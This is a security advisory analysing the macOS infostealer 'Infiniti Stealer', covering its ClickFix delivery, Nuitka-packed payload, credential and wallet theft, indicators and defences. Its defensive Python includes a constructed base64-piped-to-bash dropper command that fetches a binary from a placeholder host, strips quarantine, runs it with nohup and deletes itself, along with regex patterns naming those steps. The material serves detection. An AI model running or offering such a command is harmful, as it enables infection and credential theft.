Infiniti Stealer First macOS Infostealer Combining ClickFix Delivery with Nuitka-Compiled Python Payload

Mar 28, 2026 · macOS stealer · ClickFix + Nuitka

HIGH PRIMARY SOURCE

By Karim El Labban · ZERO|TOLERANCE


Malwarebytes researchers disclosed a previously undocumented macOS infostealer - initially tracked internally as NukeChain, then revealed as Infiniti Stealer when the operator's control panel became publicly visible - that combines the ClickFix social engineering technique with a Python 3.11 payload compiled via the open-source Nuitka compiler into a native Mach-O binary.

The malware is delivered through a fake Cloudflare CAPTCHA page hosted on update-check[.]com that instructs macOS users to open Terminal and paste a base64-obfuscated curl command.

The decoded command writes a stage-2 loader to /tmp, strips the macOS quarantine flag, executes the loader silently via nohup, passes the C2 address and authentication token through environment variables, then self-destructs and closes Terminal. The stealer that the loader unpacks harvests Chromium and Firefox credentials, macOS Keychain entries, cryptocurrency wallets, developer .env files, and screenshots.

All stolen data is exfiltrated via HTTP POST to command-and-control servers, with Telegram notifications to the operator upon completion and server-side password cracking queued for harvested credentials.

This is the first documented macOS campaign combining ClickFix delivery with a Nuitka-compiled Python stealer - a convergence of two techniques that independently have been reshaping the macOS threat landscape throughout 2025 and 2026.

01

KEY FACTS

  • What: A new macOS infostealer combining ClickFix social engineering delivery with a Python 3.11 payload compiled via Nuitka into a native Mach-O binary - the first documented convergence of these two techniques on macOS.
  • Who: macOS users broadly targeted. Developer environments specifically targeted via .env file harvesting. No specific victim organizations named.
  • How: Fake Cloudflare CAPTCHA page on update-check[.]com tricks users into pasting a base64-obfuscated curl command into Terminal. Three-stage payload chain: bash dropper, Nuitka Mach-O loader, zstd-compressed Python stealer.
  • Data: Chromium and Firefox credentials (saved passwords, cookies, autofill), macOS Keychain entries, cryptocurrency wallets, developer .env files (API keys, database credentials, cloud secrets), screenshots.
  • Actor: Unknown. Operator panel accidentally exposed, revealing the malware's true name. No attribution to a known threat actor or group.
  • Impact: Credential theft enabling downstream account takeover, cryptocurrency theft, and potential enterprise network compromise via stolen developer secrets. Scale of infections unknown.
02

WHAT HAPPENED

During routine threat hunting, Malwarebytes researchers discovered an undocumented macOS infostealer distributed through the ClickFix social engineering technique. The malware was initially tracked internally as NukeChain.

Shortly before Malwarebytes published its findings on March 26, 2026, the operator's control panel became publicly accessible on the internet, revealing the malware's actual name: Infiniti Stealer.

The accidental panel exposure confirmed this is not a one-off tool but a structured, actively operated campaign with a dedicated management interface.

The infection chain begins when a victim visits update-check[.]com - a domain hosting a near-perfect replica of a Cloudflare human verification page. The page presents what appears to be a standard "Verify you are human" CAPTCHA challenge.

Instead of clicking a checkbox, the user is instructed to open macOS Terminal and paste a provided command.

This is the ClickFix technique: rather than exploiting a software vulnerability, the attacker exploits user trust and compliance by disguising a malicious command as a routine verification step.

The command the user pastes is a base64-obfuscated curl request.

Once decoded, it fetches a bash dropper. The dropper writes the stage-2 binary to /tmp, removes the com.apple.quarantine extended attribute (the flag that would otherwise trigger Gatekeeper's first-run checks), executes the binary silently using nohup so the process survives Terminal closing, and passes the C2 server address and authentication token through environment variables rather than hardcoding them in the binary.

The script then deletes itself and closes Terminal - leaving no visible trace on the user's screen that anything has executed.
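A triage helper for a pasted ClickFix command, added here as an example (it is not code from the article or from Malwarebytes): it peels the base64 layer and scores the decoded text against the behaviours described above. The sample command is constructed to exercise every rule; its host name, file names and variable names are placeholders, not indicators from this campaign.

```python
import base64
import re

# Constructed sample modelled on the chain described in the article. The host
# name, file names and variable names are placeholders, not campaign indicators.
SAMPLE_DECODED = (
    "curl -fsSL https://example.invalid/v -o /tmp/.v && "
    "xattr -d com.apple.quarantine /tmp/.v && chmod +x /tmp/.v && "
    "C2=https://example.invalid TOKEN=abc123 nohup /tmp/.v >/dev/null 2>&1 & "
    'rm -f -- "$0"; '
    "osascript -e 'tell application \"Terminal\" to quit'"
)
SAMPLE_PASTED = "echo " + base64.b64encode(SAMPLE_DECODED.encode()).decode() + " | base64 -d | bash"

# (name, pattern, weight): weights favour behaviours that have no benign reason
# to appear in something a web page asks a user to paste into Terminal.
RULES = [
    ("base64_pipe_to_shell", r"base64\s+(-d|--decode|-D)\s*\|\s*(ba|z)?sh\b", 3),
    ("curl_to_tmp", r"\bcurl\b[^|;&]*-o\s+/(tmp|private/tmp|var/folders)/", 2),
    ("quarantine_strip", r"\bxattr\s+-(d|c|rd|rc)\b[^;&|]*com\.apple\.quarantine", 4),
    ("nohup_background", r"\bnohup\b[^;&|]*/(tmp|private/tmp|var/folders)/\S*[^&]*&", 3),
    ("env_var_to_binary", r"\b[A-Z_][A-Z0-9_]+=\S+\s+(nohup\b|/(tmp|private/tmp)/)", 2),
    ("self_delete", r'\brm\s+-f\s+(--\s+)?"?\$0', 2),
    ("close_terminal", r'tell application "Terminal" to quit', 2),
]
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")


def decode_layers(cmd, max_depth=3):
    """Peel nested base64 blobs out of the command; returns every layer, outermost first."""
    layers = [cmd]
    current = cmd
    for _ in range(max_depth):
        m = B64_RE.search(current)
        if not m:
            break
        try:
            decoded = base64.b64decode(m.group(0), validate=True).decode("utf-8", "replace")
        except ValueError:          # binascii.Error is a ValueError: bad padding or not base64
            break
        layers.append(decoded)
        current = decoded
    return layers


def triage(cmd):
    """Return (score, sorted rule names) aggregated over all decoded layers."""
    hits = {}
    for layer in decode_layers(cmd):
        for name, pattern, weight in RULES:
            if name not in hits and re.search(pattern, layer):
                hits[name] = weight
    return sum(hits.values()), sorted(hits)


if __name__ == "__main__":
    print(triage(SAMPLE_PASTED))
```

Anything scoring on quarantine_strip or self_delete deserves a human look regardless of total score; a legitimate installer one-liner (Homebrew, for instance) trips at most the curl-to-shell pattern.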

The stage-2 payload is an 8.6MB Apple Silicon Mach-O binary built using Nuitka's onefile mode. Nuitka is an open-source Python compiler that translates Python source code to C, then compiles the C code into a native binary. Unlike a PyInstaller bundle, the result carries no Python bytecode (.pyc) files that analysts can readily decompile. Note that Nuitka output still links against and ships the CPython runtime library; what disappears is the bytecode layer, not every Python artifact.

The Nuitka binary's embedded payload begins with the byte sequence 4b 41 59 28 b5 2f fd: the three-byte Nuitka onefile marker KAY (the trailing Y denotes a zstd-compressed payload; X would denote an uncompressed one) followed by the zstd frame magic number 28 b5 2f fd. Together they identify a Nuitka-packaged application with zstd-compressed embedded data.

The loader decompresses approximately 35MB of embedded data and hands execution to the final payload: UpdateHelper.bin, the Infiniti Stealer itself, also written in Python 3.11 and compiled with Nuitka.
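A file-profiling check for the loader characteristics described above, added as an example (it is neither code from the article nor from Nuitka's own tooling): it parses the Mach-O 64 header to confirm an arm64 executable and searches the whole file for the onefile marker followed by the zstd frame magic. The sample bytes are constructed (a header plus the marker, not a runnable binary), and the marker semantics assume Nuitka's 'KA' + 'X'/'Y' onefile convention.

```python
import struct
import sys

MH_MAGIC_64 = 0xFEEDFACF            # 64-bit Mach-O, little-endian on Apple Silicon and Intel
CPU_TYPE_ARM64 = 0x0100000C
CPU_TYPE_X86_64 = 0x01000007
NUITKA_ONEFILE_MARKER = b"KAY"      # assumption: Nuitka onefile 'KA' + 'Y' (Y = zstd payload, X = raw)
ZSTD_FRAME_MAGIC = b"\x28\xb5\x2f\xfd"
MACHO64_HEADER_LEN = 32


def parse_macho_header(data):
    """Return (is_macho64, cpu_name) from the 32-byte mach_header_64."""
    if len(data) < MACHO64_HEADER_LEN:
        return False, "too short"
    magic, cputype = struct.unpack_from("<II", data, 0)
    if magic != MH_MAGIC_64:
        return False, "not a thin 64-bit Mach-O (fat/universal and 32-bit images are not handled here)"
    names = {CPU_TYPE_ARM64: "arm64", CPU_TYPE_X86_64: "x86_64"}
    return True, names.get(cputype, "cputype 0x%08x" % cputype)


def find_nuitka_zstd_payload(data):
    """Offset of the first 'KAY' + zstd frame magic, or -1. The payload is appended
    after the bootstrap code, so the whole file has to be searched, not just the header."""
    return data.find(NUITKA_ONEFILE_MARKER + ZSTD_FRAME_MAGIC)


def classify(data):
    is_macho, cpu = parse_macho_header(data)
    offset = find_nuitka_zstd_payload(data)
    return {
        "macho64": is_macho,
        "cpu": cpu,
        "nuitka_onefile_zstd_offset": offset,
        # the profile reported for the stage-2 loader: arm64 Mach-O carrying a zstd onefile payload
        "matches_loader_profile": is_macho and cpu == "arm64" and offset > MACHO64_HEADER_LEN,
    }


def build_constructed_sample():
    """Constructed stand-in: a mach_header_64 for arm64 (filetype 2 = MH_EXECUTE), filler,
    then the marker and zstd magic. It is not an executable and not a real sample."""
    header = struct.pack("<IIIIIIII", MH_MAGIC_64, CPU_TYPE_ARM64, 0, 2, 0, 0, 0, 0)
    return header + b"\x00" * 4096 + NUITKA_ONEFILE_MARKER + ZSTD_FRAME_MAGIC + b"\x00" * 64


if __name__ == "__main__":
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, classify(fh.read()))
```

The marker-plus-magic sequence is equally easy to express as a YARA string; the point of the header check is to separate a Nuitka-packaged Mach-O from the many legitimate zstd streams on a developer machine, and legitimate Nuitka-built software will still match, so treat the hit as a triage lead rather than a verdict.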

Before initiating data collection, Infiniti Stealer performs anti-analysis checks. It detects virtualized and sandboxed environments including VMware, VirtualBox, and the automated analysis platforms any.run, Joe Sandbox, and Hybrid Analysis.

If the malware determines it is running in an analysis environment, it terminates without executing its stealing routines. It also introduces a randomized execution delay to avoid triggering automated detection systems that flag immediate post-execution network activity.

The collection routines cover Chromium and Firefox credential stores, the macOS Keychain, cryptocurrency wallets, and screenshots, plus developer .env files - plaintext configuration files commonly used by developers to store API keys, database credentials, cloud provider secrets, and authentication tokens.

The .env targeting is particularly significant: a single compromised developer workstation can yield credentials providing direct access to production cloud infrastructure, CI/CD pipelines, and SaaS platforms.

All harvested data is packaged and exfiltrated via HTTP POST requests to the command-and-control server. Upon successful upload, the malware sends a Telegram notification to the operator confirming the exfiltration is complete.

Harvested credentials are then queued for server-side password cracking - indicating the operation includes backend infrastructure for processing and monetizing stolen data at scale.

03

THE THREAT LANDSCAPE

Infiniti Stealer does not exist in isolation. It arrives at a moment when the macOS infostealer ecosystem has undergone rapid expansion and the ClickFix social engineering technique has become one of the fastest-growing initial access vectors on the internet.

The dominant families - Atomic Stealer (AMOS), Poseidon Stealer, Cthulhu Stealer, and Banshee Stealer - established the template: target browsers, Keychain, crypto wallets, and developer files, then sell access via Telegram and dark web forums as Malware-as-a-Service.

In February 2026, Microsoft Defender Experts published "Infostealers Without Borders," warning that macOS-targeted infostealer campaigns using ClickFix-style prompts and malicious DMG installers had accelerated since late 2025, with new families including DigitStealer, MacSync, and Phexia joining the established players.

Trend Micro documented Atomic Stealer being distributed through malicious OpenClaw skills - representing a new supply chain attack vector using AI agentic workflows.

The ClickFix technique itself has surged. ESET documented a 517% increase in ClickFix detections in the first half of 2025, with Mimecast independently corroborating a 500%+ surge.

Recorded Future, citing ESET data, assessed ClickFix detections increased by more than 500% between 2024 and 2025, documenting five distinct campaign clusters active in early 2026 - including campaigns impersonating Intuit QuickBooks, Booking.com, and macOS storage cleaning utilities.

Sophos X-Ops documented three separate ClickFix campaigns delivering the MacSync infostealer to macOS users between November 2025 and February 2026, including one that used legitimate ChatGPT shared conversations as landing pages.

Multiple state-sponsored groups have adopted ClickFix, including BlueDelta (APT28) and the North Korean group PurpleBravo.

What distinguishes Infiniti Stealer within this landscape is the combination of ClickFix delivery with Nuitka compilation.

Prior macOS ClickFix campaigns delivered stealers packaged with PyInstaller or as raw scripts - both of which are well-understood by analysts and can be decompiled or inspected with standard tooling.

Nuitka compilation translates the Python source to C and compiles it into a native binary, eliminating the bytecode layer that analysts rely on for rapid triage.

This is the same evasion advantage that Cyble documented in ApolloRAT - a Windows RAT compiled with Nuitka specifically to evade signature-based detection tuned for Python malware.

Infiniti Stealer is the first documented case of this technique being applied to a macOS stealer campaign.

04

WHAT IS TARGETED

  • Chromium-based browser credentials - Saved passwords, session cookies, autofill data, and credit card information stored by Chrome, Brave, Edge, Opera, and other Chromium-derived browsers. These credentials provide direct access to email accounts, banking portals, SaaS platforms, and social media accounts.
  • Firefox credentials - Saved passwords and session data stored in Firefox's credential store, which uses a different storage format than Chromium browsers.
  • macOS Keychain - The system-wide credential store containing Wi-Fi passwords, application passwords, certificates, secure notes, and any credential an application has stored using the Keychain API. Keychain extraction can yield credentials for VPNs, enterprise SSO systems, email clients, and development tools. Dumping login Keychain items requires the user's login password (the security CLI prompts for it); the public reporting summarized here does not describe such a prompt in the infection chain, so how the stealer unlocks the Keychain is unconfirmed.
  • Cryptocurrency wallets - Wallet files and private keys for cryptocurrency holdings. Cryptocurrency theft is immediate and irreversible - once private keys are exfiltrated, funds can be transferred within minutes with no recourse.
  • Developer .env files - Plaintext files containing environment variables used to configure applications. These commonly store AWS access keys, database connection strings, API tokens for Stripe, Twilio, SendGrid, and similar services, OAuth client secrets, and CI/CD pipeline credentials. A single .env file from a production developer workstation can provide direct access to cloud infrastructure, customer databases, and payment processing systems. This targeting makes Infiniti Stealer a potential enterprise breach vector, not merely a consumer credential stealer.
  • Screenshots - Display captures taken during execution that can reveal open applications, documents, banking sessions, email contents, and other information visible on screen at the time of infection.
05

TECHNICAL FAILURE CHAIN

1. Social engineering bypasses all technical controls. The ClickFix technique does not exploit a software vulnerability. It exploits a human one. The user voluntarily opens Terminal, pastes the command, and presses Return.

Gatekeeper, XProtect, Notarization, and System Integrity Protection are all designed to prevent unauthorized code execution - but none can intervene when the user manually executes a command in Terminal.

The entire macOS security architecture assumes the user will not voluntarily paste malicious commands into a root-capable shell. ClickFix invalidates that assumption.

2. Quarantine flag removal defeats Gatekeeper. The bash dropper removes the com.apple.quarantine extended attribute from the stage-2 binary before execution. This extended attribute is the mechanism by which macOS marks files downloaded from the internet for Gatekeeper inspection.

Without it, the binary executes without triggering the "this application was downloaded from the internet" warning dialog or Gatekeeper's signature verification. The dropper neutralizes macOS's primary first-run protection mechanism with a single xattr command.

3. Nuitka compilation evades signature-based detection. The compiled binary contains no Python source, no .pyc bytecode files, and no PyInstaller-style archive of scripts plus interpreter - the artifacts that endpoint detection tools use to identify and flag Python-based malware. (The CPython runtime library is still embedded, but the stealer's own logic is native code.)

The resulting Mach-O binary presents the same profile as any legitimate compiled application. Detection engines tuned for PyInstaller bundles, py2app packages, or raw Python scripts will not trigger on Nuitka-compiled malware without purpose-built detection rules.

4. Environment variable C2 passing avoids static indicators. The C2 server address and authentication token are passed to the stage-2 binary through environment variables set by the bash dropper - not hardcoded in the binary.

Static analysis of the Mach-O binary will not reveal the C2 infrastructure. Analysts must capture the dropper script or observe runtime behavior to identify the C2 destination.

5. Anti-analysis checks prevent automated detonation. Infiniti Stealer checks for VMware, VirtualBox, any.run, Joe Sandbox, and Hybrid Analysis environments before executing its stealing routines.

Automated malware analysis sandboxes running in these environments will not observe the stealer's behavior - the malware will terminate cleanly, producing a benign-looking analysis report.

The randomized execution delay adds a timing-based evasion layer that can cause sandboxes with short execution timeouts to miss the malicious activity entirely.

6. Self-destruction eliminates forensic artifacts. The bash dropper deletes itself and closes Terminal after launching the stage-2 payload. The initial infection vector - the decoded curl command and bash script - is not preserved on disk for forensic recovery.

Incident responders arriving after infection will find the dropper gone. The pasted command line itself, however, is normally recorded in the user's interactive shell history (~/.zsh_history on current macOS, which /etc/zshrc configures by default and which is written when the shell exits), so that file and any EDR process telemetry for the curl, xattr, and nohup executions are the first things to acquire.

7. Telegram notification enables real-time operator awareness. The Telegram notification upon successful exfiltration means the operator knows immediately when credentials are available for processing.

Combined with server-side password cracking, this enables rapid monetization - the operator can begin accessing victim accounts, draining cryptocurrency wallets, or selling credentials while the victim remains unaware of the compromise.

06

INDICATORS OF COMPROMISE

Delivery Infrastructure:

  • update-check[.]com - Fake Cloudflare CAPTCHA page

Delivery Technique:

  • ClickFix social engineering - victim pastes base64-obfuscated curl command in Terminal

Payload Chain:

  • Stage 1: Bash dropper via curl, strips com.apple.quarantine, self-destructs
  • Stage 2: 8.6MB Apple Silicon Mach-O binary compiled via Nuitka (Python 3.11)
  • Stage 3: 35MB zstd-compressed archive containing UpdateHelper.bin

Anti-Analysis:

  • VMware, VirtualBox, any.run, Joe Sandbox, Hybrid Analysis detection
  • Randomized execution delay

Targeted Data:

  • Chromium/Firefox credentials, macOS Keychain, cryptocurrency wallets, .env files, screenshots

Exfiltration:

  • HTTP POST to C2 (address passed via environment variable)
  • Telegram notification to operator on success
07

REGULATORY EXPOSURE

  • CCPA/CPRA (California Civil Code 1798.100 et seq.): If California residents are among the victims, the collection of browser credentials, Keychain entries, and .env files containing personal information triggers notification obligations. Fines of $7,500 per intentional violation. Developer .env files may contain customer database credentials, making the downstream exposure to customer PII a potential second-order CCPA event.
  • FTC Act Section 5: Organizations whose developer credentials are stolen via .env files, leading to downstream customer data breaches, face potential FTC enforcement for failure to implement reasonable security measures - particularly if .env files containing production credentials were stored on endpoint devices without encryption or access controls.
  • GDPR (Regulation 2016/679): If EU residents' credentials are harvested, Article 5(1)(f) integrity and confidentiality obligations are implicated. Organizations whose infrastructure is subsequently compromised via stolen developer credentials face Article 32 security-of-processing liability and 72-hour notification obligations under Article 33. Fines up to EUR 20M or 4% annual global turnover.
  • UK GDPR / DPA 2018: Same analysis for UK residents. ICO enforcement; fines up to GBP 17.5M or 4% turnover.
  • HIPAA (45 CFR Parts 160, 164): If healthcare developers' workstations are compromised and .env files contain credentials for systems storing protected health information, the resulting access constitutes a HIPAA breach. 60-day notification to HHS OCR and affected individuals. Fines up to $2.1M per violation category per year.
  • PCI DSS 4.0: Stolen browser credentials for payment processing portals, or .env files containing Stripe/payment API keys, create PCI DSS Requirement 8 (identification and authentication) exposure. Compromised payment credentials can lead to card-not-present fraud at scale.
  • Saudi Arabia PDPL: If Saudi residents are among victims or if compromised developer credentials provide access to systems processing Saudi personal data, SDAIA enforcement applies. Fines up to SAR 5M (~$1.3M).
  • UAE PDPL (Federal Decree-Law No. 45/2021): Same analysis for UAE residents. Fines up to AED 10M.
  • State Breach Notification Laws (US): Stolen credentials constituting personal information (usernames + passwords, financial account credentials) trigger notification obligations across all 50 states. Developer .env files creating downstream customer data exposure extend notification obligations to every affected customer.
08

INTELLIGENCE GAPS

The following gaps exist in the public record for this threat:

1. The operator behind Infiniti Stealer has not been identified or attributed to any known threat actor, group, or Malware-as-a-Service ecosystem.

The accidentally exposed control panel confirms operational infrastructure exists, but no connection to established stealer operations (AMOS, Banshee, Poseidon, Cthulhu) has been established.

2. The scale of infections is unknown.

Malwarebytes disclosed the malware's capabilities and delivery mechanism but did not publish telemetry on the number of infections observed, geographic distribution of victims, or the campaign's operational timeline beyond the March 26 disclosure date.

3. No file hashes (SHA-256, SHA-1, MD5), YARA rules, or network-based detection signatures have been published in the publicly available reporting. The Malwarebytes blog post may contain IOCs accessible only to subscribers or in a separate IOC feed.

Without hashes, defenders cannot perform retroactive hunting across their endpoint telemetry.

4. The specific cryptocurrency wallets targeted - whether Bitcoin, Ethereum, Solana, or wallet applications like MetaMask, Exodus, or Ledger Live - have not been enumerated in public reporting. This gap prevents cryptocurrency-specific protective monitoring.

5. Whether update-check[.]com is the sole distribution domain or one of multiple domains in a broader infrastructure remains unconfirmed.

The operator panel exposure suggests a more sophisticated operation than a single domain would support, but no additional infrastructure has been publicly documented.

09

ZERO|TOLERANCE Advisory

The user opened Terminal and pasted a command. That is the entire initial access chain. No zero-day. No exploit. No privilege escalation. A fake CAPTCHA page asked a macOS user to do something, and they did it.

Everything that follows - the browser credential theft, the Keychain extraction, the wallet theft, the .env file theft, the Telegram notification to the operator - all of it traces back to a single moment of misplaced trust in a verification dialog that looked like Cloudflare.

This is the operational reality that makes ClickFix one of the most effective initial access techniques active today. It bypasses every technical control in the macOS security stack simultaneously. Gatekeeper does not fire because the quarantine flag is stripped.

XProtect does not flag the binary because Nuitka compilation produces a native Mach-O executable with no Python bytecode signatures. Notarization is irrelevant because the user explicitly executed a Terminal command.

System Integrity Protection is irrelevant because no system files are modified. The macOS security architecture is designed to protect users from code that runs without their knowledge or consent.

ClickFix inverts the model: the user provides both knowledge and consent, unwittingly, in a single paste-and-return keystroke.

The defensive response begins with awareness. Employees across every role - not just technical staff - need to understand that legitimate services never ask users to open Terminal and paste commands.

This is not a message that a single annual security awareness training module will embed.

It requires targeted, repeated, scenario-based training that specifically demonstrates the ClickFix technique using examples that mimic what users will encounter: fake CAPTCHAs, fake software updates, fake verification dialogs.

Red team exercises should incorporate ClickFix lures to measure susceptibility rates and identify organizational blind spots.

If an organization's phishing simulation program tests only email-based attacks, it is missing the fastest-growing social engineering vector in the current landscape.

At the technical layer, endpoint detection and response platforms require purpose-built detection logic for Nuitka-compiled binaries. The default assumption that Python malware will present as PyInstaller bundles or raw scripts is no longer valid.

Nuitka produces native binaries with a distinctive file structure - the KAY onefile marker followed by zstd-compressed data - that can be fingerprinted.

EDR rules should flag the combination of a downloaded Mach-O binary in /tmp with the quarantine attribute stripped, executed via nohup, and making outbound HTTP POST requests within minutes of first execution.

This behavioral chain is anomalous regardless of the binary's compilation method.

Developer workstations demand specific hardening.

The .env file targeting in Infiniti Stealer reflects a broader trend: infostealer operators have recognized that a single developer laptop can yield credentials to production cloud infrastructure, customer databases, and CI/CD pipelines - making developer compromise more valuable than thousands of consumer credentials.

Eliminate plaintext .env files on endpoint devices. Use secret management platforms - HashiCorp Vault, AWS Secrets Manager, 1Password for developers, Doppler - that inject secrets at runtime without persisting them to disk. Audit developer machines for .env files containing production credentials.

If they exist today, assume they are the next thing an infostealer will harvest, because they are.
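One way to run that audit, added here as an example (not a tool from the article or from any of the vendors named above): a minimal dotenv parser plus a scanner that reports which keys hold high-value material without ever echoing the values themselves. The sample file is constructed, using the AWS documentation example access key; the directory walker is a convenience for running it against a home directory, and its exclusion list is an assumption.

```python
import os
import re

ENV_NAME_RE = re.compile(r"^\.env(\..+)?$")          # .env, .env.local, .env.production ...
PATTERNS = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("stripe_live_secret", re.compile(r"\bsk_live_[0-9A-Za-z]{16,}\b")),
    ("private_key_block", re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----")),
    ("db_url_with_password", re.compile(r"\b[a-z]+(?:\+[a-z]+)?://[^\s:/@]+:[^\s@]+@")),
]
SENSITIVE_KEY_RE = re.compile(r"(SECRET|TOKEN|PASSW(OR)?D|API_?KEY|ACCESS_KEY|PRIVATE|CREDENTIAL|_KEY$)", re.I)

# Constructed sample; the AWS values are the documented AWS example credentials.
SAMPLE_ENV = """# constructed sample, not a real .env file
APP_ENV=production
DEBUG=false
AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
DATABASE_URL=postgres://app:hunter2hunter2@db.internal:5432/app
STRIPE_KEY=sk_test_000000000000000000000000
API_TOKEN=
PORT=8080
"""


def parse_env(text):
    """Minimal dotenv parser: KEY=VALUE lines; comments, blanks and 'export ' handled; quotes stripped."""
    out = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        if line.startswith("export "):
            line = line[len("export "):]
        key, _, value = line.partition("=")
        value = value.strip()
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        out[key.strip()] = value
    return out


def scan_env_text(text):
    """Return sorted (key, reason) findings. Values are never returned, so the output is safe to log."""
    findings = set()
    env = parse_env(text)
    for key, value in env.items():
        if not value:
            continue
        for reason, pattern in PATTERNS:
            if pattern.search(value):
                findings.add((key, reason))
        if SENSITIVE_KEY_RE.search(key) and len(value) >= 16:
            findings.add((key, "sensitive_key_name_with_long_value"))
    if env.get("APP_ENV", "").lower() in ("production", "prod"):
        findings.add(("APP_ENV", "production_marker"))
    return sorted(findings)


def find_env_files(root):
    """Yield .env-style files under root, skipping trees that are noise or huge (assumed list)."""
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in ("node_modules", ".git", "Library", ".cache")]
        for name in filenames:
            if ENV_NAME_RE.match(name):
                yield os.path.join(dirpath, name)


if __name__ == "__main__":
    for path in find_env_files(os.path.expanduser("~")):
        with open(path, encoding="utf-8", errors="replace") as fh:
            hits = scan_env_text(fh.read())
        if hits:
            print(path, hits)
```

A production marker next to a database URL carrying a password, or an AWS key pair, is exactly the file the stealer is built to collect; the output lists keys only, so it can be shipped to a ticket without recreating the exposure.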

Browser credential storage represents another preventable exposure. Chromium and Firefox store credentials in databases that every macOS stealer family targets.

Enterprise password managers with browser extensions that replace the browser's native credential store - 1Password, Bitwarden, or Dashlane with organization-enforced policies - eliminate the credential database that stealers harvest.

Combine this with phishing-resistant authentication (FIDO2 hardware keys) for critical services.

Note that while FIDO2 prevents credential phishing, Sophos correctly identified that FIDO2 does not prevent ClickFix attacks - the attack does not intercept authentication; it installs malware.

FIDO2 protects the accounts the stealer tries to access after harvesting credentials, not the initial infection.

macOS MDM solutions - Jamf Pro, Mosyle, Kandji - should enforce policies that limit who can launch Terminal on managed devices (non-technical roles rarely need it), require explicit administrator approval for unsigned binaries, and, where the endpoint tooling supports it, alert on or block quarantine attribute removal.

Alert on xattr -d com.apple.quarantine operations performed on recently downloaded files. Monitor for nohup execution of binaries in /tmp.

These are the specific behavioral indicators of the Infiniti Stealer kill chain, and they are generic enough to detect future ClickFix campaigns regardless of the final payload.
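The behavioural chain described above as a worked correlation rule, added here as an example (not code from the article, from Malwarebytes, or from any EDR vendor): it runs over constructed process and network events - the field names are assumptions to be mapped onto your sensor's exec/network schema - and alerts only when quarantine removal, execution of a binary from a temporary directory, and an outbound POST from that process fall inside one window. A developer stripping quarantine from a downloaded tool, with no execution from /tmp and no POST, does not alert.

```python
import re
from collections import defaultdict

WINDOW_SECONDS = 300        # strip -> exec -> first POST must fit inside this window
TMP_RE = re.compile(r"^/(private/)?tmp/|^/var/folders/")
QUARANTINE_ATTR = "com.apple.quarantine"

# Constructed sample telemetry, not real EDR output. Field names are assumptions.
SAMPLE_EVENTS = [
    {"ts": 100, "type": "exec", "pid": 501, "argv": ["curl", "-fsSL", "https://example.invalid/v", "-o", "/tmp/.v"]},
    {"ts": 101, "type": "exec", "pid": 502, "argv": ["xattr", "-d", QUARANTINE_ATTR, "/tmp/.v"]},
    {"ts": 102, "type": "exec", "pid": 503, "argv": ["nohup", "/tmp/.v"]},
    {"ts": 103, "type": "exec", "pid": 503, "argv": ["/tmp/.v"]},        # nohup exec()s its target in place
    {"ts": 150, "type": "net", "pid": 503, "method": "POST", "dest": "203.0.113.10:443"},
    # Benign: a developer un-quarantines a downloaded tool; no exec from /tmp, no POST
    {"ts": 900, "type": "exec", "pid": 600, "argv": ["xattr", "-d", QUARANTINE_ATTR, "/Users/dev/Downloads/tool"]},
]


def _exec_target(argv):
    """Path actually being run: argv[1] when wrapped in nohup, else argv[0]."""
    if argv and argv[0].rsplit("/", 1)[-1] == "nohup" and len(argv) > 1:
        return argv[1], True
    return (argv[0] if argv else ""), False


def correlate(events, window=WINDOW_SECONDS):
    """One alert per temp-directory binary that was un-quarantined, executed, and then
    made an outbound POST, with all observed stages inside `window` seconds."""
    stages = defaultdict(dict)     # path -> {stage_name: timestamp}
    pid_to_path = {}               # pid of an executed temp binary -> its path
    for e in sorted(events, key=lambda ev: ev["ts"]):
        if e["type"] == "exec":
            argv = e["argv"]
            base = argv[0].rsplit("/", 1)[-1] if argv else ""
            if base == "curl" and "-o" in argv and argv.index("-o") + 1 < len(argv):
                path = argv[argv.index("-o") + 1]
                if TMP_RE.search(path):
                    stages[path]["download"] = e["ts"]
            elif base == "xattr" and QUARANTINE_ATTR in argv and len(argv) > 1 and argv[1] in ("-d", "-c", "-rd", "-rc"):
                stages[argv[-1]]["quarantine_strip"] = e["ts"]
            else:
                target, wrapped = _exec_target(argv)
                if TMP_RE.search(target):
                    stages[target]["exec"] = e["ts"]
                    pid_to_path[e["pid"]] = target
                    if wrapped:
                        stages[target]["nohup"] = e["ts"]
        elif e["type"] == "net" and e.get("method") == "POST" and e["pid"] in pid_to_path:
            stages[pid_to_path[e["pid"]]].setdefault("post", e["ts"])   # keep the first POST only
    alerts = []
    for path, seen in stages.items():
        if {"quarantine_strip", "exec", "post"} <= set(seen):
            span = max(seen.values()) - min(seen.values())
            if span <= window:
                alerts.append({"path": path, "stages": sorted(seen), "span_seconds": span})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The randomized execution delay described in the anti-analysis section is the reason the window is minutes rather than seconds; tune it to the longest delay you are prepared to tolerate, and keep the curl and nohup stages as enrichment rather than requirements, since a dropper can fetch with any HTTP client.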

10

SOURCES

Malwarebytes, BleepingComputer, CybersecurityNews, GBHackers, Cryptika, Cyber Security Review, Sophos X-Ops, Recorded Future, Palo Alto Networks Unit 42, Microsoft Security Blog, Cyble, Intego, Red Canary, SentinelOne, Check Point Research, Kaspersky
